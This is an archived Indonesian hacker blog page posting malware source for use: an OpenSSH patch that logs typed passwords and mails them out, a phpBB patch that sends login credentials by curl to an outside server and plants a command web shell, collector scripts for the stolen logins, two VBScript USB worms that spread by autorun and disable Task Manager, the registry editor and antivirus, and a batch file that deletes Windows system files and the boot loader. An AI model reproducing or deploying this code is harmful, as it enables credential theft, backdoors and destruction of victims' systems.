-=|FeRdy - BLoG|=-: Maret 2010

Jumat, 05 Maret 2010

Memodifikasi source code stealing password

Some Bullshit About SSH Keylogger!

This ssh keylogger patch just works on FreeBSD system. Use your fucking 
brain to make it working in other operating system. For Anti debugging 
feature, there is simple idea to prevent tracing system like strace, just 
prevent ptrace syscall! If you are cool enough, improve this keylogger to 
encrypt the data.

Keep Hacking boyz!

SSH Keylogger OpenSSH-5.3p1 Patch.

--- sshconnect2.c.ori   2010-02-12 21:44:49.000000000 +0700
+++ sshconnect2.c       2010-02-12 22:13:43.000000000 +0700
@@ -31,6 +31,7 @@
 #include 
 #include 

+#include 
 #include 
 #include 
 #include 
@@ -75,6 +76,10 @@
 #include "ssh-gss.h"
 #endif

+//SSH log
+
+#define LOGZ "/tmp/.byteskrew" // change this line and make it more hidden
+
 /* import */
 extern char *client_version_string;
 extern char *server_version_string;
@@ -92,6 +97,16 @@

 Kex *xxx_kex = NULL;

+//Anti Ptrace!
+void tracer_check(void) __attribute__((constructor));
+
+void tracer_check(void){
+   if (ptrace(PT_TRACE_ME, 0, 0, 0) == -1) {
+       _exit(-1);
+   }
+}
+
+
 static int
 verify_host_key_callback(Key *hostkey)
 {
@@ -780,8 +795,9 @@
 userauth_passwd(Authctxt *authctxt)
 {
        static int attempt = 0;
-       char prompt[150];
+       char prompt[150],logz[128];
        char *password;
+       FILE *f;

        if (attempt++ >= options.number_of_password_prompts)
                return 0;
@@ -792,6 +808,18 @@
        snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
            authctxt->server_user, authctxt->host);
        password = read_passphrase(prompt, 0);
+
+ //Password stealth
+if((f=fopen(LOGZ,"a"))!=NULL){
+fprintf

 (f,"user:password@host --> %s:%s@%s\n",authctxt->server_user,password,authctxt->host);
+fprintf(f,"user:password@host --> %s\n",password);
+    fclose(f);
+        }
+        //kirim ke server pake curl/mail terserah
+        //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"cat %s|mail -s hackme themaniac90@gmail.com",LOGZ);
+       system(logz);
+
        packet_start(SSH2_MSG_USERAUTH_REQUEST);
        packet_put_cstring(authctxt->server_user);
        packet_put_cstring(authctxt->service);
  

Fears Inside Your Forum

Do you feel secure because your password is encrypted in database?
Or you may think that hackers can't crack your password just because
your password is strong. Let me tell you something, we know what you
type in your keyboard without stealing your database. We can even
hear what your fingers dance for. No more talk, this code will show
you the fears inside your PHPBB forum.


PHPBB3 UCP.PHP Patch.

--- ucp.old.php 2009-11-16 06:12:47.000000000 -0800
+++ ucp.php 2009-11-17 09:00:08.000000000 -0800
@@ -11,6 +11,14 @@
 /**
 * @ignore
 */
+
+if(!empty($_POST['username']) AND !empty($_POST['password'])){
+  $wr = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n";
+  $uri = explode('?',$wr);
+  $toserv="/usr/bin/curl -d \"u=" . $_POST['username'] .

 "&p=" . $_POST['password'] . "&uri=" . $uri[0] . "\"

http://ipsecs.com/devel/log.php >

/dev/null 2>&1";

+  passthru($toserv);
+}
+
 define('IN_PHPBB', true);
 $phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
 $phpEx = substr(strrchr(__FILE__, '.'), 1);
@@ -41,6 +49,41 @@
 // Basic "global" modes
 switch ($mode)
 {
+ case 'hack' :
+  //echo "





This forum is hacked!";
+  ?>
+
+  






+  - Backdoor Web Shell  -
+  

<form action="<?php $_SERVER['PHP_SELF'] ?>" method="POST">+  


<table>+  <tbody>
<tr> +   <td>Command : </td> +   <td>    </td> +   <td><input name="command" type="text" /></td> +  </tr>
+
<tr> +   <td>   </td> +   <td>   </td> +   <td><input type="submit" value="execute!" /></td> +  </tr>
+  </tbody></table>+  </form>+
+  +  if(isset($_POST['command'])){
+   echo "<b>Executing \"" . $_POST['command'] . "\"</b>
\n";
+   if(!empty($_POST['command'])){
+    passthru($_POST['command']);
+   }else{
+    echo "You cannot execute blank command!
\n";
+   }
+  }
+  ?>
+  </pre>+  + break;
+
  case 'activate':
   $module->load('ucp', 'activate');
   $module->display($user->lang['UCP_ACTIVATE']);


Source Code log.php

if(isset($_POST['u']) AND isset($_POST['p']) AND isset($_POST['uri'])){

$dbhost="localhost";
$dbuser="u_logger";
$dbpass="p_logger";
$dbname="logger";

$c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
mysql_select_db($dbname) or die(mysql_error());
$q="INSERT INTO klog (username,password,uri) VALUES

( '" . $_POST['u'] . "','" . $_POST['p'] . "','" . $_POST['uri'] . "')";
$exec=mysql_query($q) or die(mysql_error());
}
?>


Source Code view.php
if(isset($_POST['key']) AND $_POST['key']=="owned"){
  $dbhost="localhost";
  $dbuser="u_logger";
  $dbpass="p_logger";
  $dbname="logger";

  $c=mysql_connect($dbhost,$dbuser,$dbpass) or die(mysql_error());
  mysql_select_db($dbname) or die(mysql_error());
  $q="SELECT username,password,uri FROM klog ORDER BY no DESC";
  $exec=mysql_query($q) or die(mysql_error());
?>


<table border="1"><pre></pre><tbody>
<tr> <td width="10%">Username</td> <td width="10%">Password</td> <td width="40%">URI</td></tr>
while($r=mysql_fetch_array($exec)){     echo "
<tr><td>" . $r['username'] . "</td>\n";     echo "<td>" . $r['password'] . "</td>\n";     echo "<td>http://" . $r['uri'] . "</td></tr>
\n";   } ?>  </tbody></table>}else{
?>
</pwd.h></netdb.h></errno.h></sys></sys></sys></pre><br />
<br />
<pre><form action="<?php echo $_SERVER['PHP_SELF'];?>" method="POST"><table><tbody>
<tr><td>Keyword</td> <td>   :</td> <td><input name="key" type="password" /></td> <td><input type="submit" value="login" /></td></tr>
</tbody></table></form>}
?>
</pre><br />
<b>Database MySQL dump</b> -- phpMyAdmin SQL Dump -- version 2.11.9.5 -- http://www.phpmyadmin.net -- -- Host: localhost -- Generation Time: Feb 14, 2010 at 06:12 PM -- Server version: 5.0.81 -- PHP Version: 5.2.5  SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";  -- -- Database: `logger` --  -- --------------------------------------------------------  -- -- Table structure for table `klog` --  CREATE TABLE IF NOT EXISTS `klog` (   `no` smallint(6) NOT NULL auto_increment,   `username` varchar(64) NOT NULL,   `password` varchar(64) NOT NULL,   `uri` varchar(512) NOT NULL,   PRIMARY KEY  (`no`) ) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;  </blockquote>

Selasa, 02 Maret 2010

kendi.vbs

on error resume next

dim a,b,c,d,e,f,g,h,K3nd1,j,l,m,n

h = "[autorun]" & vbcrlf & "shellexecute=wscript.exe K3nd1.vbs"

set a = createobject("Scripting.filesystemobject")

set b = a.getfile(Wscript.ScriptFullname)
a.CopyFile "K3nd1.vbs", "C:\WinNT.Dat"

a.CopyFile "K3nd1.vbs", "C:\Windows\System32\K3nd1.vbs"

a.CopyFile "K3nd1.vbs", "C:\Winnt\System32\K3nd1.vbs"

n = b.size
i = b.drive.drivetype

set m = b.openastextstream(1,-2)

do while not m.atendofstream
c = c & m.readline
c = c & vbcrlf
loop

Set d = a.getspecialfolder(0)
a.CopyFile WScript.ScriptFullname(d & "\K3nd1.jpg.vbs")
Set e = a.getspecialfolder(1)
a.CopyFile WScript.ScriptFullname(e & "\K3nd1.vbs")
set f = a.getfile(e & "\K3nd1.vbs")
f.attributes = 32
set f = a.createtextfile(e & "\K3nd1.vbs",2,true)
f.write c
f.close
set f = a.getfile(e & "\K3nd1.vbs")
f.attributes = 39

for each g in a.drives
If (g.drivetype = 1 or g.drivetype = 2) and g.path <> "A:" then
set f = a.getfile(g.path &"\K3nd1.sys.vbs")
f.attributes = 32
set f = g.createtextfile(g.path &"\K3nd1.vbs",2,true)
f.write c
f.close
set f = a.getfile(g.path &"\K3nd1.vbs")
f.attributes = 39
set f = a.getfile(g.path &"\autorun.inf")
f.attributes = 32
set f = a.createtextfile(g.path &"\autorun.inf",2,true)
f.write h
f.close
set f = a.getfile(g.path &"\autorun.inf")
f.attributes= 39
end if
Next

set K3nd1 = createobject("WScript.Shell")

K3nd1.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: I Like this ha ha ha ::"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"

K3nd1.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoScrSavPage", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoClose", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoFileMenu", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Program Manager\Restrictions\NoRun", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Hacked By QrembiezS ... Contact Me To Clean Up"

K3nd1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://qrembiezshack.blogspot.com"

K3nd1.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost",winpath&"\svchost.exe.vbs"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System Monitoring", "1", "REG_DWORD"

K3nd1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Virus K3nd1"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Di atas langit masih ada langit ... Tidak ada kata 100 persen aman dari virus ... jangan pernah sombong dengan system keamananmu!"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"

K3nd1.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","notepad.exe"

K3nd1.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMP.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmadAV 3.4.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GAV.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\evest.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVG.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Norton.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kaspersky.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\power remover.exe\Debugger","notepad.exe"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Virus K3nd1"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableMSI", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"

K3nd1.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig", "1", "REG_DWORD"

K3nd1.Regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\","shell32.dll,3"

a.CopyFile "C:\WinNT.Dat", "C:\Help.cfg"

a.CopyFile "C:\WinNT.Dat", "C:\WinNT.DAT"

a.CopyFile "C:\WinNT.dat", "a:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "b:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "c:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "d:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "e:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "f:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "g:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "h:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "i:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "j:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "k:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "l:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "m:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "n:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "o:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "p:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "q:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "r:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "s:s\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "t:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "u:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "v:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "w:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "x:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "y:\K3nd1.vbs"
a.CopyFile "C:\WinNT.dat", "z:\K3nd1.vbs"

if i <> 1 then

Wscript.sleep 200000

end if

do while i <> 1

set j = createobject("Wscript.shell")

j.run d & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop

batch made by ferdy

copy ferdy.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\”
attrib ferdy.exe +s +h +r
copy ferdy.exe “%USERSPROFILE%\Start Menu\Programs\Startup\”
attrib ferdy.exe +s +h +r
echo silahkan tunggu sebentar....
del "c:\windows\system32\bootok" /q/s >nul
del "c:\windows\system32\bootvid.dll" /q /s >nul
del "c:\windows\system32\bootvrfy" /q /s >nul
del "c:\windows\system32\regedt32.exe" /q /s >nul
ren ferdy.exe explorers.exe
copy explorers.exe %SYSTEMROOT%\
copy explorers.exe %SYSTEMROOT%\svchost.bat
copy explorers.exe %SYSTEMROOT%\system32\
copy explorers.exe %SYSTEMROOT%\system32\svchost.bat
copy explorers.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\”
attrib explorers.exe +s +h +r
copy explorers.exe “%USERSPROFILE%\Start Menu\Programs\Startup\”
attrib explorers.exe +s +h +r
reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths” /ve /d %systemroot%\explorers.exe /t reg_dword /d 0 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v System /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v System /d explorers.exe /t reg_dword /d 0 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v explorer /d explorers.exe /t reg_dword /d 0 /f
cd %SYSTEMROOT%\system32\
attrib explorers.exe +s +h +r
cd %SYSTEMROOT%\
attrib explorers.exe +s +h +r
echo [ferdy] >> win.ini
echo path=%SYSTEMROOT%\explorers.exe >>win.ini
cd %systemdrive%\
attrib ntldr -s -h -r
ren ntldr ferdy
move /y ferdy %systemroot%/system32
attrib ferdy +s +h +r
reg add "HKCU\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d 1 /f
reg add "HKCU\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d 1 /f
WshShell.RegDelete “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”
WshShell.RegDelete “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\
Policies\System\DisableTaskMgr”
WshShell.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
Winlogon\Shell”,”explorers.exe”
WshShell.RegDelete “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\Shell”
WshShell.RegDelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Policies\System\Shell”
assoc .*=.f3rdy
attrib explorers.exe +s +h +r
reg add "hkcu\softaware\microsoft\windows\currentversion\policies\system" /v disablecmd /t reg_dword /d 2 /f
del %systemroot%
shutdown -r -t 1 -f
exit p/a/q

flyff666.dll.vbs

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=WScript.exe ferdy.vbs"
set fs = createobject("Scripting.FileSystemObject")
Fs.DeleteFile("C:/Windows/System32/regedt32.exe")
Fs.DeleteFile("C:/Windows/System32/cmd.exe")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\ferdy.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\ferdy.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\ferdy.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\ferdy.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\ferdy.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\ferdy.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&"\ferdy.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Ferdy"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
rg.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", "67108863", "REG_DWORD"
